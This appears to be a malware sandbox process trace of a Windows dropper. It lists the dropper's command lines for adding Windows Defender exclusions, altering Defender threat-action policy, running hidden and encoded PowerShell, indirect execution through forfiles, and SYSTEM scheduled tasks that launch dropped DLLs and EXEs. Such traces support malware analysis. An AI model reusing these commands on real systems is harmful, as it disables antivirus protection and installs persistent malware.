C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:323⤵PID:2540
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:643⤵PID:2492
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1936 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:324⤵PID:3032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:643⤵PID:2120
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\wGQmUIZKEGuxadPB\PcdULMWl\YGxHApANvtCaWYPv.wsf"3⤵
- System Location Discovery: System Language Discovery
PID:2800
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\wGQmUIZKEGuxadPB\PcdULMWl\YGxHApANvtCaWYPv.wsf"3⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1316 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:3064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR" /t REG_DWORD /d 0 /reg:644⤵PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:324⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FjYcCGTppOUn" /t REG_DWORD /d 0 /reg:644⤵PID:860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OmYhQlgyU" /t REG_DWORD /d 0 /reg:644⤵PID:2608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:324⤵PID:1788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dBdCwOiUpBsdC" /t REG_DWORD /d 0 /reg:644⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:324⤵PID:2592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZOpYAGqatpU2" /t REG_DWORD /d 0 /reg:644⤵PID:2216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eZNCfusnXmtZMmVB" /t REG_DWORD /d 0 /reg:644⤵PID:2184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:324⤵PID:2812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wGQmUIZKEGuxadPB" /t REG_DWORD /d 0 /reg:644⤵PID:2912
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEFRKurQb" /SC once /ST 06:57:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEFRKurQb"3⤵PID:2220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEFRKurQb"3⤵
- System Location Discovery: System Language Discovery
PID:1552
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2352 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2340
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1972
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tgKluuvSNQRGAHQwW" /SC once /ST 19:42:50 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wGQmUIZKEGuxadPB\heSZBZIzLRRKNsz\mAxzPSG.exe\" fN /LxIGdidHU 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "tgKluuvSNQRGAHQwW"3⤵PID:2196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 6803⤵
- Loads dropped DLL
- Program crash
PID:1672
-
-
-
C:\Windows\Temp\wGQmUIZKEGuxadPB\heSZBZIzLRRKNsz\mAxzPSG.exeC:\Windows\Temp\wGQmUIZKEGuxadPB\heSZBZIzLRRKNsz\mAxzPSG.exe fN /LxIGdidHU 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1620 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1616
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2416 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2304 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:836
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:900 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2636 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2112
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1864 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2152 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:1740
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:1880 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2268
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:748
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2616 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- System Location Discovery: System Language Discovery
PID:2612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:928 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
- System Location Discovery: System Language Discovery
PID:1736
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bQeBRIfYCApeQZGKek"3⤵PID:2164
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
- System Location Discovery: System Language Discovery
PID:2288 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
- Indirect Command Execution
PID:2420 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2376
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:820 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1692 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
- System Location Discovery: System Language Discovery
PID:1652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OmYhQlgyU\AvBchx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jYxDgykbLQIqEEE" /V1 /F3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jYxDgykbLQIqEEE2" /F /xml "C:\Program Files (x86)\OmYhQlgyU\EKqdWeJ.xml" /RU "SYSTEM"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jYxDgykbLQIqEEE"3⤵PID:2268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jYxDgykbLQIqEEE"3⤵
- System Location Discovery: System Language Discovery
PID:1300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OibvKUbCFWAeNZ" /F /xml "C:\Program Files (x86)\rZOpYAGqatpU2\lUFbVOw.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SgTldWdJyDXUX2" /F /xml "C:\ProgramData\eZNCfusnXmtZMmVB\qmhQqLJ.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wmWRqWhgZsXCMPdXZ2" /F /xml "C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR\EbEXBrU.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RJVImfMUYoaVBdYkcUO2" /F /xml "C:\Program Files (x86)\dBdCwOiUpBsdC\mHghyaQ.xml" /RU "SYSTEM"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "POGTAxIfkFSBYDVsP" /SC once /ST 00:21:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll\",#1 /IErdida 525403" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "POGTAxIfkFSBYDVsP"3⤵
- System Location Discovery: System Language Discovery
PID:1572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tgKluuvSNQRGAHQwW"3⤵PID:2700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 15723⤵
- Loads dropped DLL
- Program crash
PID:2156
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll",#1 /IErdida 5254032⤵PID:1268
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll",#1 /IErdida 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2712 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "POGTAxIfkFSBYDVsP"4⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {13A2C9A9-E344-49CB-9AC9-377B3577710F} S-1-5-21-2257386474-3982792636-3902186748-1000:CTBHAMHL\Admin:Interactive:[1]1⤵PID:968
-
